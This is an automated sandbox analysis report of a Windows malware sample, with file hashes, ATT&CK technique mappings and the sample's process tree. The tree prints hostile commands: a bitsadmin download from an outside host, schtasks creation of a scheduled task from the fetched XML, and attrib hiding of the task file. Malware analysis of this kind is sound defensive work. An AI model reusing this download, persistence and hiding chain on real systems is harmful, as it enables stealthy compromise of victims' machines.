f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109

General

Target

f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
Size

102KB
MD5

741d79de62c0d6a30f1e84b1eb6604ee
SHA1

3383f9a71e614a65a151d0392a87e3dd379bf579
SHA256

f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109
SHA512

8156eb0a3e8856efadce37f982408189f69126298dd5564b05d1ca6872add84490e4581e696f320a9ed1dadbd37f56429604d5efa401320829b1ed730943297c

Score

8^/10

evasion

Malware Config

Signatures

Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1564 attrib.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1644 schtasks.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1836 bitsadmin.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

528 ipconfig.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1580 PING.EXE

pid	process
1564	attrib.exe

pid	process
1644	schtasks.exe

pid	process
1836	bitsadmin.exe

pid	process
528	ipconfig.exe

pid	process
1580	PING.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.execmd.exe

description	pid	process	target process
PID 1972 wrote to memory of 964	1972	f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe	cmd.exe
PID 1972 wrote to memory of 964	1972	f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe	cmd.exe
PID 1972 wrote to memory of 964	1972	f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe	cmd.exe
PID 1972 wrote to memory of 964	1972	f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe	cmd.exe
PID 964 wrote to memory of 528	964	cmd.exe	ipconfig.exe
PID 964 wrote to memory of 528	964	cmd.exe	ipconfig.exe
PID 964 wrote to memory of 528	964	cmd.exe	ipconfig.exe
PID 964 wrote to memory of 528	964	cmd.exe	ipconfig.exe
PID 964 wrote to memory of 1508	964	cmd.exe	cmd.exe
PID 964 wrote to memory of 1508	964	cmd.exe	cmd.exe
PID 964 wrote to memory of 1508	964	cmd.exe	cmd.exe
PID 964 wrote to memory of 1508	964	cmd.exe	cmd.exe
PID 964 wrote to memory of 1580	964	cmd.exe	PING.EXE
PID 964 wrote to memory of 1580	964	cmd.exe	PING.EXE
PID 964 wrote to memory of 1580	964	cmd.exe	PING.EXE
PID 964 wrote to memory of 1580	964	cmd.exe	PING.EXE
PID 964 wrote to memory of 1836	964	cmd.exe	bitsadmin.exe
PID 964 wrote to memory of 1836	964	cmd.exe	bitsadmin.exe
PID 964 wrote to memory of 1836	964	cmd.exe	bitsadmin.exe
PID 964 wrote to memory of 1836	964	cmd.exe	bitsadmin.exe
PID 964 wrote to memory of 1600	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1600	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1600	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1600	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1644	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1644	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1644	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1644	964	cmd.exe	schtasks.exe
PID 964 wrote to memory of 1564	964	cmd.exe	attrib.exe
PID 964 wrote to memory of 1564	964	cmd.exe	attrib.exe
PID 964 wrote to memory of 1564	964	cmd.exe	attrib.exe
PID 964 wrote to memory of 1564	964	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1564 attrib.exe

pid	process
1564	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
"C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4Q0EH70O.cmd" "C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:964
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c type infile.txt
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\PING.EXE
    ping -a 8.8.8.8 -n 1 -4
    3⤵
    - Runs ping.exe
    PID:1580
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin.exe /transfer "SyncScriptXML" /download /priority FOREGROUND http://onlineservices.fawmatt.com.au/AppStore/ALL-Domainless/syncscript.xml C:\Windows\Temp\syncscript.xml
    3⤵
    - Download via BitsAdmin
    PID:1836
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Delete /TN "SyncScript" /F
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Create /TN "SyncScript" /XML C:\Windows\Temp\SyncScript.xml
    3⤵
    - Creates scheduled task(s)
    PID:1644
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\Windows\System32\Tasks\SyncScript +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

Scheduled Task

Persistence

BITS Jobs

1

T1197

Hidden Files and Directories

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

BITS Jobs

1

T1197

Hidden Files and Directories

2

T1158

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4Q0EH70O.cmd

Filesize
4KB

MD5
4901c736143f06b956c7d4268609ba67

SHA1
5e2c086ac18b82d5a5d5474a5bd26e31d733eb17

SHA256
555f20bb938c7e90e1cbf0eb173aae217d06aae2fbb96b2bfefc4684439f0851

SHA512
c43f67f9b528d9e76527063d78af3e38fb108a7352aa5b4658a6a25e0f77b208494b17b269681df95c3754d16ed5ca8e644f10b958d86acd520d88d742ccf997

Download Submit
C:\Users\Admin\AppData\Local\Temp\infile.txt

Filesize
1KB

MD5
8a0843fb162a5dae6c75715e5b2d2106

SHA1
74365e4e603f18e717b5c5d27223d5f628a87e03

SHA256
396f70283592615c189c48c75ccf65b9d4a894271b71bc087a575b674a9bcb34

SHA512
089584a1d4bf8e5a52a39237ed7b48bc624bbeb7b1c07cfb3fb165d06494502ff18eed4d327255957b699f9be10afc70bf1105938efb7f1e025bb7ddf93232cd

Download Submit
memory/528-56-0x0000000000000000-mapping.dmp

Download
memory/528-57-0x0000000075371000-0x0000000075373000-memory.dmp

Filesize
8KB

Download
memory/964-54-0x0000000000000000-mapping.dmp

Download
memory/1508-58-0x0000000000000000-mapping.dmp

Download
memory/1564-65-0x0000000000000000-mapping.dmp

Download
memory/1580-60-0x0000000000000000-mapping.dmp

Download
memory/1600-63-0x0000000000000000-mapping.dmp

Download
memory/1644-64-0x0000000000000000-mapping.dmp

Download
memory/1836-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads